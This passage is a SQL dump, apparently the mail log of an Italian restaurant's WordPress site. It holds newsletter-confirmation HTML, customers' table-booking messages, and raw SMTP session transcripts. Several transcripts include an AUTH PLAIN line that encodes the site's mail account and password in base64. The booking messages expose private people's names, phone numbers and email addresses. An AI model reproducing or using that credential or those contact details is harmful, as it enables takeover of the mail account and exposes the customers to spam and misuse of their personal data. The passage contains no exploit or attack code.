href=\"https://www.ristorantesolymar.it\" target=\"_blank\">https://www.ristorantesolymar.it</a>\" style=\"color: #00a6f9; text-decoration: underline; text-decoration: none;\">\n                                                                                                                                        <span style=\"color:#00a6f9\"><a href=\"https://www.ristorantesolymar.it\" target=\"_blank\">https://www.ristorantesolymar.it</a></span>\n                                                                                                                                    </a>, please confirm your subscription by clicking the following button. -->\n                                                                        </p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;\" align=\"left\">\n                                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:separate;\" align=\"left\" border=\"0\">\n                                                                        <tbody>\n                                                                            <tr>\n                                                                                <td style=\"border:none;border-radius:3px;color:#ffffff;cursor:auto;padding:10px 25px;\" align=\"center\" valign=\"middle\" bgcolor=\"#00a6f9\">\n                                                                                    <a href=\"https://www.ristorantesolymar.it?subscribe=1&user_email=VaniJolla@belan.website&mj_sub_comment_author_token=189be5c06accc9506c122923c033dff0913718ee\" style=\"text-decoration:none;background:#00a6f9;color:#ffffff;font-family:Arial, sans-serif;font-size:16px;font-weight:normal;line-height:120%;text-transform:none;margin:0px;\"><b>Sì, voglio iscrivermi a questa lista</b></a>\n                                                                                </td>\n                                                                            </tr>\n                                                                        </tbody>\n                                                                    </table>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px;\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">\n                                                                        <p style=\"font-size: 15px; margin: 10px 0;\">Se hai ricevuto questa e-mail per errore o non vuoi più iscriverti, semplicemente ignora questo messaggio.</p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                        </tbody>\n                                                    </table>\n                                                </div><!--[if mso | IE]>\n                        </td></tr></table>\n                            <![endif]--></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]-->\n                            <!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px;\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px;mso-line-height-rule:exactly;\">\n                            <![endif]--><div style=\"margin:0px auto;max-width:600px;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px;\">\n                            <![endif]--><div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"word-wrap:break-word;font-size:0px;\"><div style=\"font-size:1px;line-height:40px;white-space:nowrap;\"> </div></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]--></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]--></div>\n                    </body>\n                    </html>'),(21182,1032,'original_headers','[\"From: Sol Y Mar, ristorante a Riccione <webmaster@baldisserri.com>\"]'),(21183,1032,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n-line-height-rule:exactly;\">=0A                            <![endif]--><=\r\ndiv style=3D\"margin:0px auto;max-width:600px;background:#ffffff;\"><table=\r\n role=3D\"presentation\" cellpadding=3D\"0\" cellspacing=3D\"0\" style=3D\"font=\r\n-size:0px;width:100%;background:#ffffff;\" align=3D\"center\" border=3D\"0\">=\r\n<tbody><tr><td style=3D\"text-align:center;vertical-align:top;direction:l=\r\ntr;font-size:0px;padding:20px 0px;\"><!--[if mso | IE]>=0A              =\r\n              <table role=3D\"presentation\" border=3D\"0\" cellpadding=3D\"0=\r\n\" cellspacing=3D\"0\">=0A                              <tr>=0A           =\r\n                     <td style=3D\"vertical-align:top;width:600px;\">=0A =\r\n                           <![endif]--><div class=3D\"mj-column-per-100 o=\r\nutlook-group-fix\" style=3D\"vertical-align:top;display:inline-block;direc=\r\ntion:ltr;font-size:13px;text-align:left;width:100%;\">=0A               =\r\n                                     <table role=3D\"presentation\" cellpa=\r\ndding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" border=3D\"0\">=0A          =\r\n                                              <tbody>=0A               =\r\n                                             <tr>=0A                   =\r\n                                             <td style=3D\"word-wrap:brea=\r\nk-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:20=\r\npx;\" align=3D\"left\">=0A                                                =\r\n                    <div style=3D\"cursor:auto;color:#5e6977;font-family:=\r\nArial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">=0A=\r\n                                                                       =\r\n <h1 style=3D\"font-family: \'Trebuchet MS\', Helvetica, Arial, sans-serif;=\r\n font-size: 28px; font-weight: normal; line-height: 32px;\"><b><span styl=\r\ne=3D\"font-family:Arial,sans-serif\">Per favore conferma la tua iscrizione=\r\n</span></b></h1>=0A                                                    =\r\n                </div>=0A                                              =\r\n                  </td>=0A                                             =\r\n               </tr>=0A                                                =\r\n            <tr>=0A                                                    =\r\n            <td style=3D\"word-wrap:break-word;font-size:0px;padding:10px=\r\n 25px;padding-top:0px;padding-bottom:0px;\" align=3D\"left\">=0A          =\r\n                                                          <div style=3D\"=\r\ncursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;l=\r\nine-height:22px;text-align:left;\">=0A                                  =\r\n                                      <p style=3D\"font-size: 15px; margi=\r\nn: 10px 0;\">=0A                                                        =\r\n                    Per ricevere le newsletter a partire da <a href=3D\"h=\r\nttps://www.ristorantesolymar.it\" target=3D\"_blank\">https://www.ristorant=\r\nesolymar.it</a>, conferma la tua iscrizione cliccando sul seguente pulsa=\r\nnte:=0A                                                                =\r\n            <!--                                                       =\r\n To receive newsletters from: =0A                                      =\r\n                                                                       =\r\n                       <a target=3D\"_blank\" href=3D\"<a href=3D\"https://w=\r\nww.ristorantesolymar.it\" target=3D\"_blank\">https://www.ristorantesolymar=\r\n..it</a>\" style=3D\"color: #00a6f9; text-decoration: underline; text-decor=\r\nation: none;\">=0A                                                      =\r\n                                                                       =\r\n           <span style=3D\"color:#00a6f9\"><a href=3D\"https://www.ristoran=\r\ntesolymar.it\" target=3D\"_blank\">https://www.ristorantesolymar.it</a></sp=\r\nan>=0A                                                                 =\r\n                                                                   </a>,=\r\n please confirm your subscription by clicking the following button.=C2=\r\n=A0-->=0A                                                              =\r\n          </p>=0A                                                      =\r\n              </div>=0A                                                =\r\n                </td>=0A                                               =\r\n             </tr>=0A                                                  =\r\n          <tr>=0A                                                      =\r\n          <td style=3D\"word-wrap:break-word;font-size:0px;padding:10px 2=\r\n5px;\" align=3D\"left\">=0A                                               =\r\n                     <table role=3D\"presentation\" cellpadding=3D\"0\" cell=\r\nspacing=3D\"0\" style=3D\"border-collapse:separate;\" align=3D\"left\" border=\r\n=3D\"0\">=0A                                                             =\r\n           <tbody>=0A                                                  =\r\n                          <tr>=0A                                      =\r\n                                          <td style=3D\"border:none;borde=\r\nr-radius:3px;color:#ffffff;cursor:auto;padding:10px 25px;\" align=3D\"cent=\r\ner\" valign=3D\"middle\" bgcolor=3D\"#00a6f9\">=0A                          =\r\n                                                          <a href=3D\"htt=\r\nps://www.ristorantesolymar.it?subscribe=3D1&user_email=3DVaniJolla@belan=\r\n..website&mj_sub_comment_author_token=3D189be5c06accc9506c122923c033dff09=\r\n13718ee\" style=3D\"text-decoration:none;background:#00a6f9;color:#ffffff;=\r\nfont-family:Arial, sans-serif;font-size:16px;font-weight:normal;line-hei=\r\nght:120%;text-transform:none;margin:0px;\"><b>S=C3=AC, voglio iscrivermi=\r\n a questa lista</b></a>=0A                                             =\r\n                                   </td>=0A                            =\r\n                                                </tr>=0A               =\r\n                                                         </tbody>=0A   =\r\n                                                                 </table=\r\n>=0A                                                                </td=\r\n>=0A                                                            </tr>=0A=\r\n                                                            <tr>=0A    =\r\n                                                            <td style=3D=\r\n\"word-wrap:break-word;font-size:0px;padding:10px 25px;padding-top:0px;pa=\r\ndding-bottom:0px;\" align=3D\"left\">=0A                                  =\r\n                                  <div style=3D\"cursor:auto;color:#5e697=\r\n7;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-ali=\r\ngn:left;\">=0A                                                          =\r\n              <p style=3D\"font-size: 15px; margin: 10px 0;\">Se hai ricev=\r\nuto questa e-mail per errore o non vuoi pi=C3=B9 iscriverti, semplicemen=\r\nte ignora questo messaggio.</p>=0A                                     =\r\n                               </div>=0A                               =\r\n                                 </td>=0A                              =\r\n                              </tr>=0A                                 =\r\n                       </tbody>=0A                                     =\r\n               </table>=0A                                             =\r\n   </div><!--[if mso | IE]>=0A                        </td></tr></table>=\r\n=0A                            <![endif]--></td></tr></tbody></table></d=\r\niv><!--[if mso | IE]>=0A                            </td></tr></table>=\r\n=0A                            <![endif]-->=0A                         =\r\n   <!--[if mso | IE]>=0A                            <table role=3D\"prese=\r\nntation\" border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n align=3D\"center\" style=3D\"width:600px;\">=0A                           =\r\n   <tr>=0A                                <td style=3D\"line-height:0px;f=\r\nont-size:0px;mso-line-height-rule:exactly;\">=0A                        =\r\n    <![endif]--><div style=3D\"margin:0px auto;max-width:600px;\"><table r=\r\nole=3D\"presentation\" cellpadding=3D\"0\" cellspacing=3D\"0\" style=3D\"font-s=\r\nize:0px;width:100%;\" align=3D\"center\" border=3D\"0\"><tbody><tr><td style=\r\n=3D\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;pad=\r\nding:20px 0px 20px 0px;\"><!--[if mso | IE]>=0A                         =\r\n   <table role=3D\"presentation\" border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\">=0A                              <tr>=0A                      =\r\n          <td style=3D\"vertical-align:top;width:600px;\">=0A            =\r\n                <![endif]--><div class=3D\"mj-column-per-100 outlook-grou=\r\np-fix\" style=3D\"vertical-align:top;display:inline-block;direction:ltr;fo=\r\nnt-size:13px;text-align:left;width:100%;\"><table role=3D\"presentation\" c=\r\nellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" border=3D\"0\"><tbody><t=\r\nr><td style=3D\"word-wrap:break-word;font-size:0px;\"><div style=3D\"font-s=\r\nize:1px;line-height:40px;white-space:nowrap;\">=C2=A0</div></td></tr></tb=\r\nody></table></div><!--[if mso | IE]>=0A                            </td>=\r\n</tr></table>=0A                            <![endif]--></td></tr></tbod=\r\ny></table></div><!--[if mso | IE]>=0A                            </td></=\r\ntr></table>=0A                            <![endif]--></div>=0A        =\r\n            </body>=0A                    </html>\r\n.\r\n250 OK id=1joufs-0007PV-Mt\r\n'),(21184,1033,'success','1'),(21185,1033,'from_header','Giovanni <notifiche@ristorantesolymar.it>'),(21186,1033,'to_header','teosphone@gmail.com'),(21187,1033,'reply_to_header','giopino69@yahoo.it'),(21188,1033,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21189,1033,'original_to','teosphone@gmail.com'),(21190,1033,'original_subject','Da sito Sol Y Mar: \"Sabato4\"'),(21191,1033,'original_message','Da: Giovanni <giopino69@yahoo.it>\nTelefono: 3384456645\nOggetto: Sabato4\n\nCorpo del messaggio:\nSalve avete possibilità di cena con bella vista mare ? Per sabato sera 4/7 avreste eventualmente due posti? Fate solo pesce? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21192,1033,'original_headers','From: Giovanni <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: giopino69@yahoo.it\n'),(21193,1033,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 29 Jun 2020 10:34:30 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Giovanni <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: giopino69@yahoo.it\r\nMessage-Id: <d99e5aad814c9d30ba079bd376818166@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Sabato4\"\r\nDate: Mon, 29 Jun 2020 14:34:30 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Giovanni <giopino69@yahoo.it>=0ATelefono: 3384456645=0AOggetto: Saba=\r\nto4=0A=0ACorpo del messaggio:=0ASalve avete possibilit=C3=A0 di cena con=\r\n bella vista mare ? Per sabato sera 4/7 avreste eventualmente due posti?=\r\n Fate solo pesce? Grazie=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 s=\r\ntata inviata da un modulo di contatto su Sol Y Mar (https://www.ristoran=\r\ntesolymar.it)\r\n.\r\n250 OK id=1jpure-0002DW-Ea\r\n'),(21194,1034,'success','1'),(21195,1034,'from_header','Viviana <notifiche@ristorantesolymar.it>'),(21196,1034,'to_header','teosphone@gmail.com'),(21197,1034,'reply_to_header','viviana.guaraldo@evolveonline.it'),(21198,1034,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21199,1034,'original_to','teosphone@gmail.com'),(21200,1034,'original_subject','Da sito Sol Y Mar: \"PRENOTAZIONE TAVOLO\"'),(21201,1034,'original_message','Da: Viviana <viviana.guaraldo@evolveonline.it>\nTelefono: 3351230864\nOggetto: PRENOTAZIONE TAVOLO\n\nCorpo del messaggio:\nBuongiorno, vorrei prenotare un tavolo per sabato 18 luglio a pranzo, siamo in 5. Arriveremmo verso le ore 12,30.\r\nGrazie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21202,1034,'original_headers','From: Viviana <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: viviana.guaraldo@evolveonline.it\n'),(21203,1034,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 29 Jun 2020 11:37:37 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Viviana <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: viviana.guaraldo@evolveonline.it\r\nMessage-Id: <cf6ddf8a1725b4278ef2e443c5178d1c@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"PRENOTAZIONE TAVOLO\"\r\nDate: Mon, 29 Jun 2020 15:37:37 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Viviana <viviana.guaraldo@evolveonline.it>=0ATelefono: 3351230864=0A=\r\nOggetto: PRENOTAZIONE TAVOLO=0A=0ACorpo del messaggio:=0ABuongiorno, vor=\r\nrei prenotare un tavolo per sabato 18 luglio a pranzo, siamo in 5. Arriv=\r\neremmo verso le ore 12,30.=0D=0AGrazie.=0A=0AAccettato=0A=0A--=0AQuesta=\r\n e-mail =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (http=\r\ns://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1jpvqj-0000cI-B4\r\n'),(21204,1035,'success','1'),(21205,1035,'from_header','Angelo <notifiche@ristorantesolymar.it>'),(21206,1035,'to_header','teosphone@gmail.com'),(21207,1035,'reply_to_header','angelo_gregorio@virgilio.it'),(21208,1035,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21209,1035,'original_to','teosphone@gmail.com'),(21210,1035,'original_subject','Da sito Sol Y Mar: \"prenotazione\"'),(21211,1035,'original_message','Da: Angelo <angelo_gregorio@virgilio.it>\nTelefono: 3339022559\nOggetto: prenotazione\n\nCorpo del messaggio:\nSalve, è possibile riservare un tavolo per 6 persone per venerdi 10 luglio ore 21: ?\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21212,1035,'original_headers','From: Angelo <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: angelo_gregorio@virgilio.it\n'),(21213,1035,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 01 Jul 2020 06:20:07 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Angelo <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: angelo_gregorio@virgilio.it\r\nMessage-Id: <0b47c546e89f83df9ac396643cb6d1d9@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"prenotazione\"\r\nDate: Wed, 01 Jul 2020 10:20:07 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Angelo <angelo_gregorio@virgilio.it>=0ATelefono: 3339022559=0AOggett=\r\no: prenotazione=0A=0ACorpo del messaggio:=0ASalve, =C3=A8 possibile rise=\r\nrvare un tavolo per 6 persone per venerdi 10 luglio ore 21: ?=0A=0AAccet=\r\ntato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contat=\r\nto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1jqZqZ-0005eL-Ee\r\n'),(21214,1036,'success',''),(21215,1036,'from_header','Giulia <notifiche@ristorantesolymar.it>'),(21216,1036,'to_header','teosphone@gmail.com'),(21217,1036,'reply_to_header','giulia.bacch@gmail.con'),(21218,1036,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21219,1036,'original_to','teosphone@gmail.com'),(21220,1036,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavolo\"'),(21221,1036,'original_message','Da: Giulia <giulia.bacch@gmail.con>\nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21222,1036,'original_headers','From: Giulia <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: giulia.bacch@gmail.con\n'),(21223,1036,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n'),(21224,1037,'success',''),(21225,1037,'from_header','Giulia <notifiche@ristorantesolymar.it>'),(21226,1037,'to_header','teosphone@gmail.com'),(21227,1037,'reply_to_header','giulia.bacch@gmail.con'),(21228,1037,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21229,1037,'original_to','teosphone@gmail.com'),(21230,1037,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavolo\"'),(21231,1037,'original_message','Da: Giulia <giulia.bacch@gmail.con>\nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21232,1037,'original_headers','From: Giulia <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: giulia.bacch@gmail.con\n'),(21233,1037,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n'),(21234,1038,'success',''),(21235,1038,'from_header','Giulia <notifiche@ristorantesolymar.it>'),(21236,1038,'to_header','teosphone@gmail.com'),(21237,1038,'reply_to_header','giulia.bacch@gmail.con'),(21238,1038,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21239,1038,'original_to','teosphone@gmail.com'),(21240,1038,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavolo\"'),(21241,1038,'original_message','Da: Giulia <giulia.bacch@gmail.con>\nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21242,1038,'original_headers','From: Giulia <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: giulia.bacch@gmail.con\n'),(21243,1038,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n'),(21244,1039,'success',''),(21245,1039,'from_header','Giulia <notifiche@ristorantesolymar.it>'),(21246,1039,'to_header','teosphone@gmail.com'),(21247,1039,'reply_to_header','giulia.bacch@gmail.con'),(21248,1039,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21249,1039,'original_to','teosphone@gmail.com'),(21250,1039,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavolo\"'),(21251,1039,'original_message','Da: Giulia <giulia.bacch@gmail.con>\nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21252,1039,'original_headers','From: Giulia <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: giulia.bacch@gmail.con\n'),(21253,1039,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n'),(21254,1040,'success','1'),(21255,1040,'from_header','Anna <notifiche@ristorantesolymar.it>'),(21256,1040,'to_header','teosphone@gmail.com'),(21257,1040,'reply_to_header','diglioanna.a@gmail.com'),(21258,1040,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21259,1040,'original_to','teosphone@gmail.com'),(21260,1040,'original_subject','Da sito Sol Y Mar: \"Prenotazione 10 luglio\"'),(21261,1040,'original_message','Da: Anna <diglioanna.a@gmail.com>\nTelefono: 3408374918\nOggetto: Prenotazione 10 luglio\n\nCorpo del messaggio:\nBuona sera, ho provato a chiamare senza alcun riscontro. Chiedevo se era possibile prenotare una cena per il 10 luglio per un compleanno. Grazie mille per la disponibilità. Anna\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21262,1040,'original_headers','From: Anna <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: diglioanna.a@gmail.com\n'),(21263,1040,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 04 Jul 2020 13:16:45 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Anna <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: diglioanna.a@gmail.com\r\nMessage-Id: <f8fb3f3d73656329731febaedb43b622@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione 10 luglio\"\r\nDate: Sat, 04 Jul 2020 17:16:45 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Anna <diglioanna.a@gmail.com>=0ATelefono: 3408374918=0AOggetto: Pren=\r\notazione 10 luglio=0A=0ACorpo del messaggio:=0ABuona sera, ho provato a=\r\n chiamare senza alcun riscontro. Chiedevo se era possibile prenotare una=\r\n cena per il 10 luglio per un compleanno. Grazie mille per la disponibil=\r\nit=C3=A0. Anna=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata invia=\r\nta da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.=\r\nit)\r\n.\r\n250 OK id=1jrlmP-0005mz-9b\r\n'),(21264,1047,'success','1'),(21265,1047,'from_header','Silvia Cassanelli <notifiche@ristorantesolymar.it>'),(21266,1047,'to_header','teosphone@gmail.com'),(21267,1047,'reply_to_header','silvia.cassanelli78@gmail.com'),(21268,1047,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21269,1047,'original_to','teosphone@gmail.com'),(21270,1047,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21271,1047,'original_message','Da: Silvia Cassanelli <silvia.cassanelli78@gmail.com>\nTelefono: 